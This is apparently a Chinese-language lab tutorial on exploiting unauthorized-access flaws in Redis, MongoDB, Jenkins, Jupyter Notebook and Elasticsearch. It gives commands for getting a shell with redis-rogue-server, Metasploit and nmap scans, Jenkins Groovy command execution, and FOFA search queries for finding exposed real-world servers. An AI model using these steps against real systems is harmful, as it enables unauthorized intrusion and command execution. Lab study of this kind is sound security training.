1.Redis未授权访问漏洞
使用虚拟机安装vulhub启动环境(我使用虚拟机为centos7.6,推荐使用Debian,安装方法看blog.csdn.net/2401_86440467/article/details/140992143?spm=1001.2014.3001.5501)
在另一台虚拟机kali上安装redis,输入apt install redis,成功后redis加粗,执行指令时有颜色
使用redis连接环境,输入,换为开启环境ip与端口
redis-cli -h 192.168.147.136 -p 6379
连接后,可以执行操作,证明连接成功
下载工具redis-rogue-server,链接:github.com/n0b0dyCN/redis-rogue-server
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
下载完毕后使用工具获取shell,输入如下,前面为环境ip,后面为使用工具虚拟机ip
python3 redis-rogue-server.py --rhost 192.168.147.136 --lhost 192.168.147.140
成功后输入i,获取到shell。(如果工具报错,可以物理机去下载拖到虚拟机)
2.MongoDB未授权访问漏洞
Debian拉取环境
docker pull mongo
启动环境,端口为27017,可以使用ps查看环境是否启动成功
docker run -d -p 27017:27017 --name mongodb mongo
使用另一台虚拟机使用nmap扫描,发现存在未授权访问漏洞
nmap -p 27017 --script mongodb-info 192.168.147.140
也可以使用MSF进行漏洞测试,先打开msf
依次执行,注意第二句更换为环境ip
use auxiliary/scanner/mongodb/mongodb_login
set rhost 192.168.147.140
set threads 15
run
发现能够不需认证直接连接
3.Jenkins未授权访问漏洞
fofa搜索,可以不进行登录访问,执行命令,得到用户名
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
println "whoami" .execute().text
4.Jupyter NoteBook未授权访问漏洞
Debian进入vulhub/jupyter/notebook-rce目录,开启环境,存在未授权访问漏洞的话,可以访问
点击New的Terminal ,可以进入终端
5.Elasticsearch未授权访问漏洞
fofa搜索
"Elasticsearch" && port="9200"
若存在未授权访问漏洞,便可以直接进入信息页面